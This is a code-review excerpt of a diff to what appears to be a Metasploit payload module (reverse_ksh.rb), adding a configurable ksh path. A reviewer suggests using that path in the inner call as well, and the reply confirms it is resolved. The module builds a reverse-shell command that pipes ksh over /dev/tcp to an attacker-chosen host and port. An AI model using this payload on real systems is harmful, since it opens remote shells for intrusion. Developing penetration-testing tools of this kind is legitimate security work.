modules/payloads/singles/cmd/unix/reverse_ksh.rb

```diff
@@ -28,13 +28,18 @@ def initialize(info = {})
       'RequiredCmd' => 'ksh',
       'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
+    register_advanced_options(
+      [
+        OptString.new('KSHPath', [true, 'The Path to KSH executable', 'ksh'])
+      ]
+    )
   end
 
   def generate(_opts = {})
     super + command_string
   end
 
   def command_string
-    "ksh -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 2>&1 <&1'"
+    "#{datastore['KSHPath']} -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 2>&1 <&1'"
```

Comment:
```suggestion
    "#{datastore['KSHPath']} -c '#{datastore['KSHPath']} >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 2>&1 <&1'"
```

Not sure if this is needed or not but stood out as a concern.

Reply:
Confirmed resolved.